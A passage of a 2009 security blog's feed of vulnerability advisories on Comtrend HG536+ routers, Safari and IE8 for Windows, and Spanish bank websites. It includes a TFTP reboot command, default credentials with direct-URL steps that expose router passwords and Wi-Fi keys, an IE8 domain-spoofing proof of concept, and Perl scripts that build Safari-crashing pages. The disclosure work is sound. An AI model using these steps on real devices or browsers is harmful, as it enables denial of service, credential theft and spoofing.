/>(this file exists in poligon firmwares but you can use other<br />that´s have in yopur router in the /webs folder).<br /><br />let´s try to upload it from my machine to /webs router folder<br /><br />tftp -i 192.168.1.1 PUT c:\tweaking.html /webs<br /><br />the file is aparently upload and the tftp server is configured<br />for reboot the router after upload finished.<br /><br />Them i make the same test via Wan access and i have<br />the same result the router is reboot...<br /><br />This can cause a DoS to a user , because a atacker<br />can force to reset all time, the victim´s router.<br /><br />###############<br />versions<br />###############<br /><br />Comtrend HG536+ router with this firmwares:<br /><br />firmware Comtrend A101-302JAZ-C01_R05<br /><br />firmware A101-302JAZ-C03_R14.A2pB021g.d15h<br /><br />firmware Poligon, Release.0810b_1525 ADSLZONE v.1.10.08.11b (tftp issue)<br /><br />##############<br />Solution<br />#############<br /><br />No solution was available at this time.<br /><br />by default this router is configured for<br />denied the access from WAN connections<br />But this style attack can be done if any<br />user is inside the LAN or if enable the<br />access from WAN for tftp service.<br /><br />Configure to disable tftp and<br />Grant access to device ,only to trust users.<br /><br />################# €nd #############<br /><br />Thnx To Brink for test with me and for<br />his patience wen i reboot his router :P<br />Brinkxd@gmail.com<br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-53695024849911109812009-06-10T08:06:00.014-07:002009-06-11T07:21:57.216-07:00Caja Granada ha Parcheado Su web###################################<br />Caja Granada ha Parcheado Su web<br />vendor Url:http://caja.caja-granada.es/<br />###################################<br /><br />La web de La entidad bancaria Caja granada bajo uno<br />de sus diferentes dominios,se vio afectada por una <br />serie de errores de validacion de tipo Cross-site <br />scripting (<a href="http://es.wikipedia.org/wiki/Cross-site_scripting" target="_blank">XSS</a>) y de tipo (<a href="http://en.wikipedia.org/wiki/Cross-site_request_forgery" target="_blank">CSRF</a>)<br /><br />Estas vulnerabilidades fueron descubiertas y <br />estudiadas por mi hasta descubrir las vulnerabilidades<br />o vectores de ataque, en la parte externa de la web;es <br />decir en la parte no autentificada de la web.<br /><br />Las vulnerabilidades fueron reportados al equipo de seguridad<br />logica de La entidad, y al servicio de atencion al cliente,<br />despues del intercambio de unos mails, ha quedado parcheada<br />la parte mas critica de estas vulnerabilidades, la cual<br />permitia la inclusion de todo un sitio web bajo un frame<br />sobe el dominio principal de la entidad.<br /><br /><p align="justify"><a href="http://www.spymac.com/upload/2009/06/10/ZfNTMQPOzb.gif" target="_blank"><img style="WIDTH: 400px; HEIGHT: 300px" src="http://www.spymac.com/upload/2009/06/10/ZfNTMQPOzb.gif" width="400" height="300" boder="1"/></a></p><br /><br />Caja Granada vuelve a ser segura en esos puntos reportados.<br />Ningun cliente de Caja granada pudo verse afectado , ya que<br />las comunicaciones se produjeron con absoluta discreccion<br />por ambas partes.<br /><br />En el caso de la inclusion del sitio, ademas de haber sido<br />corregido , se nos muestra un mensage advirtiendonos de si<br />de verdad hemos accedido a esa url atraves del dominio de<br />caja Granada.<br /><br /><p align="justify"><a href="http://www.spymac.com/upload/2009/06/10/HTeOSAsMXy.gif" target="_blank"><img style="WIDTH: 400px; HEIGHT: 300px" src="http://www.spymac.com/upload/2009/06/10/HTeOSAsMXy.gif" width="400" height="300" boder="1"/></a></p><br /><br />No se da ninguna prueba de cocepto por motivos evidentes.<br /><br />Referencias :<br /><br />http://caja.caja-granada.es<br /><br />http://lostmon.blogspot.com/2009/01/la-banca-espaola-ante-el-phishing.html<br /><br />http://lostmon.blogspot.com/2009/02/entidades-bancarias-espanolas-ante-el.html<br /><br /><br /><br />################## €nd ###################<br /><br /><br />Thnx to estrella to be my ligth<br />Thnx To FalconDeOro for his support<br />Thnx To Imydes From http://www.imydes.com<br />--<br />atentamente:<br />Lostmon (lost...@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-88557559947244985432009-06-03T03:24:00.007-07:002009-06-05T00:38:34.002-07:00Caixa Sabadell Parchea sus dominios web####################################### <br />Caixa Sabadell Parchea sus dominios web <br />vendor: http://www.caixasabadell.es<br />####################################### <br /><br /><br />La web de Caixa Sabadell bajo dos de sus diferentes dominios, <br />se vio afectada por una serie de errores de validacion de tipo<br />Cross-site scripting (XSS). <br /><br />Estas vulnerabilidades fueron descubiertas y estudiadas por mi<br />hasta descubrir las vulnerabilidades o vectores de ataque, en <br />la parte externa de la web;es decir en la parte no autentificada<br />de la web.<br /><br />Las vulnerabilidades fueron reportados al equipo de seguridad<br />logica de La entidad, y al servicio de atencion al cliente,<br /><br />Estas ediciones han sido solucionadas ya a dia de hoy, y asi<br />caixa Sabadell vuelve a ser segura en esos puntos reportados.<br /><br />No se da ninguna prueba de cocepto por motivos evidentes. <br /><br />Referencias :<br /><br />http://www.caixasabadell.es<br /><br />http://lostmon.blogspot.com/2009/01/la-banca-espaola-ante-el-phishing.html<br /><br />http://lostmon.blogspot.com/2009/02/entidades-bancarias-espanolas-ante-el.html<br /><br /><br /><br />################## €nd ###################<br /><br /><br />Thnx to estrella to be my ligth <br />Thnx To FalconDeOro for his support <br />Thnx To Imydes From http://www.imydes.com <br />-- <br />atentamente: <br />Lostmon (lost...@gmail.com) <br />Web-Blog: http://lostmon.blogspot.com/ <br />Google group: http://groups.google.com/group/lostmon (new) <br />-- <br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-25331230392470222972009-05-12T11:15:00.005-07:002009-05-12T12:00:15.590-07:00Safari 4 Automatic explorer.exe launch###############################<br />Safari for windows automatic command line launch<br />advisory:http://lostmon.blogspot.com/<br />2009/05/safari-4-automatic-explorerexe-launch.html<br />vendor notify:yes <br />###############################<br /><br />###########<br />Description<br />############<br /><br />Safari 4 public beta (528.16) is prone vulnerable<br />to a local file comandline automatic launch.<br /><br />I test it in windows vista & windows 7 rc<br /><br />first take a look ..=><br /><br />http://msdn.microsoft.com/en-us/library/aa767914(VS.85).aspx#app_reg<br />http://msdn.microsoft.com/en-us/library/aa767914(VS.85).aspx#url_inv<br /><br />In this documentation in "security alert" say :<br /><br />"Applications handling URL protocols must be robust<br />in the face of malicious data.<br />Because handler applications receive data from untrusted<br />sources, the URL and other parameter values passed to <br />the application may contain malicious data attempting to<br />exploit the handling application. For this reason, handling<br />applications that could initiate unwanted actions based on<br />external data must first confirm those actions with the user"<br /><br />Take a look, how to use search-ms protocol handler:<br /><br />http://msdn.microsoft.com/en-us/library/bb266520.aspx<br /><br />and<br /><br />how to display windows objects in a command line :<br />http://www.codeproject.com/KB/system/ExplorerObjects.aspx<br /><br /><br />With all of this information a user can compose a html<br />document that call search-ms protocol handler , and use<br />some explorer objetcs.<br /><br />########<br />testing<br />########<br /><br />search-ms:query=microsoft&<br />search-ms:query=vacation&subquery=mydepartment.search-ms&<br />search-ms:query=seattle&crumb=kind:pics&<br />search-ms:query=seattle&crumb=folder:C:\MyFolder&<br /><br />If you compose a html document with a iframe or a link that<br />contains any of those search-ms url firefox,google chrome,and<br />IE8 show a warning.( this is correct)but if you click in accept<br />it open explorer.exe and execute the search...<br /><br />If you test the same with safari,this browser, opens <br />directly the iframe or the link without any prompt <br />or any warning.<br /><br />If we look the implementation on this protocol handler,<br />and we look how to show explorer objects, we can compose<br />a "special" url that can contain explorer objects in<br />"location" parameter and we can launch explorer.exe that<br />can search in a determinate place of our machine.<br /><br />for example :<br /><br />search-ms:displayname=Search%20In%20Google.com&crumb=<br />location:%3A%3A{20D04FE0-3AEA-1069-A2D8-08002B30309D}<br />&stackedby=System.ItemTypeText&recurring:true<br /><br />open explorer.exe , and close the tab where <br />explorer was called and close explorer.exe too<br /><br />search-ms:displayname=Search%20In%20Google.com<br />&crumb=location:D%3A%5C&stackedby=System.ItemTypeText<br />&recurring:true<br /><br />open explorer and explode the search box:<br /><br />search-ms:displayname=%3D[]%20OR%20%3D%20OR%20%3D%20OR%20%3D&location:<br /><br />the displayname param we can use it for spoof location,and<br />show for example in this case google.com (the victims can <br />think that the browser is searching in google.com)<br /><br />If we put directly this url in the address bar of safari<br />this browser say , that it can´t open this url because <br />it don´t know the associate program.<br /><br />But if we pass this ur in a iframe , safari don´t show<br />any warning and it execute this url and search withing <br />the files of the victim.<br /><br />If we pass this url to Firefox , it show a warning , and<br />if we click in allow , this search is executed,if we pass<br />the url in a link or in a iframe the result is the same.<br /><br />With Google Chrome if we pass the url to address bar,<br />Chrome search this url in google ( not affected directly)<br />but if we pass the url in a iframe or in a link , it show<br />a warning , click in allow and the search is executed.<br /><br />with IE8 show a warning , but the search isn´t executed, <br />because it is incorrect to explorer, we can compose others<br />one. (it works too)<br /><br />Wen explorer.exe is launching , the process is called with<br />this params:<br /><br />this "injection" executes at commandline level =><br />c:\windows\explorer.exe /separate,/idlist,%1,%L<br /><br />I'm doing several test and try to obtain this other command line =><br /><br />c:\windows\explorer.exe /N,%windir%\system32,<br />/select,%windir%\system32\calc.exe<br /><br />but at this moment i can't pass this command line in a<br />iframe with search-ms protocol.<br /><br /><br />¿ a remote user can collect the result of this local search ??<br />i don,t know any way to do it; but for example we can cause a<br />DoS to explorer if compose a HTML document with tree or four<br />iframes that call search-ms and it can use tu turn slow the<br />PC or for abuse of te search indexer or explorer.exe<br /><br />A link with only put the protocol search-ms: with tree <br />or four explorer windows , it can be abuse of memory ,<br />and in some cases eplorer.exe crashes.<br /><br />I exchange some mails whith MSRC (microsoft) and <br />the and i in the final conclusion , we think that at<br />this moment this not supose a security vulnerability<br />in IE8 , because it show the warnig , and we don´t have<br />found a vector to attack or to bypass the restrintions on<br />the search-ms implementation to turn it in a Remote command<br />execution or remote code execution.<br /><br />This is the final response from Microsoft:<br />#######################################<br /><br />We have completed our investigation into this issue<br />and believe there is not a security issue here for <br />Microsoft to address. Our investigation has not shown<br />any method whereby a search-ms URL could either execute<br />arbitrary code or return search results to a third party.<br />Although additional search windows can be generated from<br />multiple iframe on a web page, this is a temporary DoS<br />condition. We can find no security issue with the search-ms<br />protocol itself. As such, this is not something MSRC would track. <br /><br />Please let me know if you feel we have missed something<br />in our analysis. Otherwise, I will be closing the MSRC <br />case down. I do appreciate you taking the time to report <br />this to us and working with us throughout the investigation.<br />########################################<br /><br />but if we remember wen we call search-ms protocol<br />in a web page it executes this:<br />c:\windows\explorer.exe /separate,/idlist,%1,%L<br /><br />them .. at this moment it isn´t a vulnerability in IE<br />but i think that this issue need to be track ... <br /><br />###############€nd#####################<br /><br />Thnx to estrella to be my ligth<br />Thnx to all Lostmon Team !!<br />Thnx The Microsoft Research Security Center<br />for their support. http://blogs.technet.com/msrc/<br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-40605119638167675612009-04-27T02:55:00.006-07:002009-04-27T04:39:41.270-07:00Comtrend HG536+ vulnerabilities##########################################<br />Comtrend HG536+ vulnerabilities <br />Vendor url:www.comtrend.com<br />Advisore Url:http://lostmon.blogspot.com/2009/04/<br />comtrend-hg536-vulnerabilities.html<br />Vendor notify: NO<br />#########################################<br /><br /><h5>These Flaws are discovered before by Isecauditors<br />see http://www.securityfocus.com/bid/32975</h5><br />sorry for the inconvenience...<br />#####################<br />Description By vendor<br />#####################<br /><br />The HG536+ is an 802.11g (54Mbps) wireless and wired<br />Local Area Network (WLAN) ADSL router. Four 10/100 <br />Base-T Ethernet ports provide wired LAN connectivity <br />with an integrated 802.11g WiFi WLAN Access Point for <br />wireless connectivity.<br /><br />################<br />Vulnerabilities<br />################<br /><br />this device is by default with this settings:<br /><br />==========================================<br />l LAN port IP address: 192.168.1.1<br />l Local administrator account name: admin<br />l Local administrator account password: admin<br />l Local non- administrator account name: user<br />l Local non- administrator account password: user<br />l Remote WAN access: disabled<br />l Remote WAN access account name: support<br />l Remote WAN access account password: support<br />l NAT: enable and firewall: disable<br />l DHCP server on LAN interface: enable<br />l WAN IP address: none<br />============================================<br /><br />All Of this flaws are because the access control <br />is based in a ineffective javascript control in<br />'menuBcm.js' file that enables or disables view<br />items in the menu.html file, according of user <br />was logged in.<br /><br />For this reason a minimal user , can call directly<br />all pages,that are parts of the web interface <br />bypassing the "pseudo restrictions" access role.<br /><br />for exploit all flaws , a minimal account credentials<br />are required.<br /> <br />Vuln 1 => access Control error<br /><br />if a user has access to non administrator user<br />by entering username "user" and password "user"<br />with this user only can update the firmware , manage<br />SNMP ,and view some status in the router ,and do <br />diagnostics , about adsl connectivity.This user<br />aparently is "restricted" to take some actions.<br /><br />This router in this firmware version , has a <br />access control error and a user without privileges <br />( user-user) can access to all functions if he <br />make a direct request to the interested file or<br />functions.<br /><br />example :<br /><br />this user has no access to manage the setup of router<br />but by entering http://192.168.1.1/wancfg.cmd<br />he can configure the WAN settings.<br /><br />download the config =><br />http://192.168.1.1/backupsettings.html<br /><br />view wireless key => <br />http://192.168.1.1/wlsecurity.html<br /><br /><br /><br />Vuln 2 => clear text admin passwords disclosure.<br /><br />login in the router with user -user account<br />and open http://192.168.1.1/password.html <br />try to view the source code...<br /><br />in the source we found :<br /><br />=======================<br />pwdAdmin = 'admin';<br />pwdSupport = 'support;<br />pwdUser = 'user';<br />=======================<br /><br /><br />###############<br />versions<br />###############<br /><br />Comtrend HG536+ <br />firmware A101-302JAZ-C03_R14.A2pB021g.d15h<br /><br />##############<br />Solution<br />#############<br /><br />No solution was available at this time.<br /><br />by default this router is configured for <br />denied the access from WAN connections<br />But this style attack can be done if any <br />user is inside the LAN or if enable the <br />access from WAN.<br /><br />configure to deny Wan connections and<br />Grant access to device ,only to trust users.<br /><br />################# €nd #############<br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-23147974354544909472009-03-05T00:47:00.006-08:002009-03-05T01:05:41.725-08:00IE8 beta RC1 res://ieframe.dll/acr_error.htm Spoff###########################################<br />IE8 beta RC1 res://ieframe.dll/acr_error.htm Spoff<br />Vendor page: www.microsoft.com<br />Advisore:http://lostmon.blogspot.com/<br />2009/03/ie8-beta-rc1-resieframedllacrerrorhtm.html<br />vendor notify:yes exploit available:yes<br />############################################<br /><br /><br />Internet explorer 8 has a flaw that allows remote users to<br />spooff the domain name in 'ieframe.dll' wen is set to <br />'acr_error.htm' in res: uri handler a remote user can <br />compose a Bad link thats shows in domain name for example<br />google.com , but wen click in the link it goes to other <br />site (spooffing)<br /><br />#################<br />Proof of concept<br />#################<br /><br /><blockquote><html><br /><head><br /><script type="text/javascript"><br />function open_win()<br />{<br />window.open("res://ieframe.dll/acr_error.htm#http://www.google.com/,http://Lostmon.blogspot.com","_blank","toolbar=yes, location=no, directories=no, status=no, menubar=yes, scrollbars=no, resizable=no, copyhistory=no");<br />}<br /></script><br /></head><br /><title>..:[-IE8 res://ieframe.dll/acr_error.htm Domain name Spoff -]:..</title><br /><br /><body><br /><form><br /><input type="button" value="Open Window" onclick="open_win()"><br /></form><br /></body><br /><br /></html></blockquote><br />#######################################<br /><br />Thnx To estrella to be my ligth<br />Thnx to all Lostmon Team.<br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-82680578437342533552009-02-21T14:29:00.006-08:002009-06-05T00:36:53.685-07:00Entidades bancarias españolas ante el phishing II#######################################<br />Entidades bancarias españolas ante el phishing II<br />#######################################<br /><br />Este articulo es una segunda parte de este otro:<br /><br /><a href="http://lostmon.blogspot.com/2009/01/la-banca-espaola-ante-el-phishing.html">La banca española ante el phishing</a><br /><br />Despues del estudio realizado sobre el estado<br />de la banca española ante el phishing,me gustaria<br />decir como ha sido la relacion y que ha pasado <br />despues de ese articulo.<br /><br />Se ha intentando notificar a las entidades afectadas<br />Los problemas encontrados en sus webs , atraves de los<br />cuales atacantes remotos podrian intentar lanzar ataques<br />de phishing sobre las mimas webs de estas entidades.<br /><br />Para la decepcion general,ha sido una minoria de las <br />entidades afectadas las que han contentado o se han <br />interesado por saber algunoslos posibles puntos flacos<br />de sus webs.<br /><br />No se les ha pedido nada mas que parchearan sus webs<br />y se les ha ofrecido ayuda y orientacion ,asi como<br />el reporte de todos las vulnerabilidades encontradas,<br />y siendo todo esto ofrecido sin ningun animo de lucro.<br /><br />En vista del poco interes prestado, lo mas logico es <br />poner una señal de stop y hacer una reflexion seria<br />sobre si tan seguros son los servicios que nos ofrecen<br />como se empeñan en mostrarnos en sellos y sellos de calidad<br />y garantia.<br /><br />Casi todos suelen escudarse en que por falta de tiempo se <br />sacan a produccion partes o proyectos que no han sido aun <br />bien probados o testeados a fondo....<br /><br />No deberian Antes de hacer eso , testear y retestear , para<br />no poner en peligro otras partes dela web?.<br /><br />No revelo las vulnerabilidades por motivos obvios<br />aunque si podeis ver unas capturas como prueba del<br /> concepto(he borrado la informacion destacada de las URL)<br />y dire que pero entre ellas se haya una muy grave la cual <br />la entidad afetada deberia correjir cuanto antes;<br />pues permite la inclusion de todo un sitio web <br />bajo un frame en su dominio, las demas son agujeros<br />xss y sql injection , asi como algun escape de<br />informacion suficiente para lanzar un aatque de tipo<br />ingenieria social.<br /><br />Me dejo dos en el tintero que son las que parecen <br />dispuestas aparchear y merecen su tiempo para ello<br />al menos por el interes prestado.<br /><br />Las entidades afectadas son :<br /><br />##############<br />servicaixa<br />##############<br /><br />http://www.servicaixa.com<br /><a href="http://usuarios.lycos.es/reyfuss/xss/images/banca/servicaixa.GIF" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/banca/servicaixa.GIF" height="250" width="400"></center></a><br /><br /><br />###########<br />sa nostra<br />###########<br /><br />www.sanostra.es<br /><br /><a href="http://usuarios.lycos.es/reyfuss/xss/images/banca/sanostra.GIF" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/banca/sanostra.GIF" height="250" width="400"></center></a><br /><br />###############<br />caixa sabadell<br />###############<br /><br />http://www.caixasabadell.com<br /><a href="http://usuarios.lycos.es/reyfuss/xss/images/banca/caixasabadell.GIF" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/banca/caixasabadell.GIF" height="250" width="400"></center></a><br /><br />Esta entidad Ya ha solucionado Sus Dos<br />agujeros y vuelve a ser segura en esos puntos.<br /><br />##################<br />caixa manresa<br />##############<br /><br />http://www.caixamanresa.es<br /><a href="http://usuarios.lycos.es/reyfuss/xss/images/banca/caixaManresa.GIF" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/banca/caixaManresa.GIF" height="250" width="400"></center></a><br /><br />###########<br />caja duero<br />###########<br /><br />https://www.cajaduero.es<br /><a href="http://usuarios.lycos.es/reyfuss/xss/images/banca/cajaduero.GIF" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/banca/cajaduero.GIF" height="250" width="400"></center></a><br /><br />###########<br />cajasol<br />###########<br /><br />http://www.cajasol.es<br /><a href="http://usuarios.lycos.es/reyfuss/xss/images/banca/cajasol.GIF" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/banca/cajasol.GIF" height="250" width="400"></center></a><br /><br />##############<br />deutsche-bank<br />###############<br /><br />http://www.deutsche-bank.es<br /><a href="http://usuarios.lycos.es/reyfuss/xss/images/banca/deuchebank.GIF " target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/banca/deuchebank.GIF" height="250" width="400"></center></a><br />#####################<br />kutxa.net<br />####################<br /><br />http://www.kutxa.net<br /><a href="http://usuarios.lycos.es/reyfuss/xss/images/banca/kutxa.GIF " target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/banca/kutxa.GIF" height="250" width="400"></center></a><br /><br />se les notifico un agujero xss<br />concretamente un XSS persistente<br />y este ha sido ya pacheado.<br /><br />###########<br />Banesto<br />############<br /><br />http://www.banesto.es<br /><a href="http://usuarios.lycos.es/reyfuss/xss/images/banca/Banesto.GIF " target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/banca/Banesto.GIF" height="250" width="400"></center></a><br /><br />###################<br />banco santander:<br />###################<br /><br />https://www.bancosantander.es<br /><a href="http://usuarios.lycos.es/reyfuss/xss/images/banca/bancosantander.GIF " target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/banca/bancosantander.GIF" height="250" width="400"></center></a><br /><br />###########<br />cajastur<br />###########<br /><br />http://www.cajastur.es<br /><a href="http://usuarios.lycos.es/reyfuss/xss/images/banca/cajasur.GIF " target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/banca/cajasur.GIF" height="250" width="400"></center></a><br /><br /><br />################€nd###################<br /><br />--<br /><br />atentamente:<br />Lostmon (Lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group:http://groups.google.com/group/lostmon (new)<br />--<br /><br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-3461156568361235552009-01-31T12:10:00.007-08:002009-02-01T00:52:10.192-08:00Safari 3.2.1 for windows SafariURL protocol Handler abusse(null Deference)##############################################<br />Safari 3.2.1 for windows safariUrl protocol Handler abusse(null Deference)<br />Vendor:http://www.apple.com<br />original advisore:http://lostmon.blogspot.com/2009/01/<br />safari-321-for-windows-safariurl.html<br />vendor notify:YES Exploit available: Private<br />##############################################<br /><br />This article is a "second" part of :<br />http://lostmon.blogspot.com/2009/01/safari-for-windows-321-remote-http-uri.html<br /><br />Safari for windows in prone vulnerable to a null pointer deference<br />in protocols handlers http, ftp and SafariURL.<br /><br />The issue is triggered when a user in click a specially crafted link <br />with malformed uri that causess a NULL pointer derefence safari, <br />and will result in loss of availability for the browser.<br /><br />In the case of SafariURL is very curious, because we can compose<br />a malformed url like SafariIRL://../ or SafariURL://http://../ or <br />ftp://../ and wen try to open it whith safari,safari opens a new<br /> windows , and wen we try to close this new one,clicking in the <br />'X' the window is closed, but it reopens again ...<br /><br />sO why it opens again in a infinite loop?<br />Take a look of posible source code of the fucnction.<br />in any place of the code before using a pointer, <br />it check that it is not equal to NULL:<br /><br />######################<br />Part of code affected<br />######################<br /><br />CFURLRef safariURL = nil; <br />OSStatus err = LSFindApplicationForInfo(kLSUnknownCreator, CFSTR("com.apple.Safari"), nil, nil, &safariURL);if (err != noErr)<br />displayErrorAndQuit(@"Unable to locate Safari", @"Nightly builds of WebKit require Safari to run. Please check that it is available and then try again."); <br />NSBundle *safariBundle = [NSBundle bundleWithPath:[(NSURL *)safariURL path]];<br />CFRelease(safariURL);<br />return safariBundle; }<br /><br />###############################<br /><br />Simple PoC<br /><br /><blockquote><br />################################################<br /># !/usr/bin/perl<br /># Safari_httpDoSPoc.pl<br /># Safari for Windows 3.2.1 Remote http: uri handler DoS<br /># Lostmon [Lostmon@gmail.com ]<br />#[http://lostmon.blogspot.com]<br /><br /><br />$archivo = $ARGV[0];<br />if(!defined($archivo))<br />{<br /><br /> print "Uso: $0 <archivo.html>\n";<br /><br />}<br /><br />$cabecera = "<html><Title> Safari 3.2.1 for windows Browser Die PoC By Lostmon</title><br /><body>" . "\n";<br />$codigo = "<h3>Safari 3.2.1 for windows Browser Die PoC By Lostmon <br>(lostmon@gmail.com) http://lostmon.blogspot.com</h3><br /><P>This PoC is a malformed http ,safariurl and ftp URI, this causes that safari for windows<br><br />turn inestable and unresponsive.<br><br />Click THIS link.=></p><a href=\"SafariURL://http://../\">Safari Die()</a> or this other =><a href=\SafariURL://"http://./\">Safari Die()</a><br /><br><br />=></p><a href=\"SafariURL://ftp://../\">Safari Die()</a> or this other =><a href=\SafariURL://"ftp://./\">Safari Die()</a><br />";<br />$piepag = "</body></html>";<br /><br />$datos = $cabecera . $codigo . $piepag;<br /><br /> open(FILE, '>' . $archivo);<br /> print FILE $datos;<br /> close(FILE);<br /><br />exit;<br /><br />############################################<br /></blockquote><br /><br />I don´t know if it has remote code execution, or other<br />i make SEVERAL test and only can cause a DoS ,<br />i don´t know if we can change NSBundle...<br /><br />this issue with SafariURL can exploit across other browsers.<br />wen open the link with other browsers it executes safari.exe -url [link]<br /><br />Thnx To estrella to be my ligth<br />Thnx to all Lostmon Team.<br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-46140181567656774822009-01-27T13:33:00.003-08:002009-01-27T13:53:41.998-08:00Safari for Windows 3.2.1 Remote http: URI handler DoSA "malformed" http domain name , can cause that safari turn in<br />a infinite loop wen try to resolve this domain, and it can cause<br />at memory level a access violation wen try to write a secction<br />that contains unknow data. <br /><br />See Safari_httpDoSPoc.pl file to demostrate it !<br /><br />AppName: safari.exe AppVer: 3.525.27.1 ModName: safari.exe<br />ModVer: 3.525.27.1 Offset: 00089394<br /><br /><a href="http://usuarios.lycos.es/reyfuss/xss/images/safari_excepcion.GIF" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/safari_excepcion.GIF" height="250" width="400"></center></a><br /><br /><br /><blockquote><br />################################################<br /># !/usr/bin/perl<br /># Safari_httpDoSPoc.pl<br /># Safari for Windows 3.2.1 Remote http: uri handler DoS<br /># Lostmon [Lostmon@gmail.com ]<br />#[http://lostmon.blogspot.com]<br /><br /><br />$archivo = $ARGV[0];<br />if(!defined($archivo))<br />{<br /><br /> print "Uso: $0 <archivo.html>\n";<br /><br />}<br /><br />$cabecera = "<html><Title> Safari 3.2.1 for windows Browser Die PoC By Lostmon</title><br /><body>" . "\n";<br />$codigo = "<h3>Safari 3.2.1 for windows Browser Die PoC By Lostmon <br>(lostmon@gmail.com) http://lostmon.blogspot.com</h3><br /><P>This PoC is a malformed http URI, this causes that safari for windows<br><br />turn inestable and unresponsive.<br><br />Click THIS link.=></p><a href=\"http://../\">Safari Die()</a> or this other =><a href=\"http://./\">Safari Die()</a><br />";<br />$piepag = "</body></html>";<br /><br />$datos = $cabecera . $codigo . $piepag;<br /><br /> open(FILE, '>' . $archivo);<br /> print FILE $datos;<br /> close(FILE);<br /><br />exit;<br /><br />############################################<br /></blockquote><br /><br />Thnx To estrella to be my ligth<br />Thnx to all who belive in me...<br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
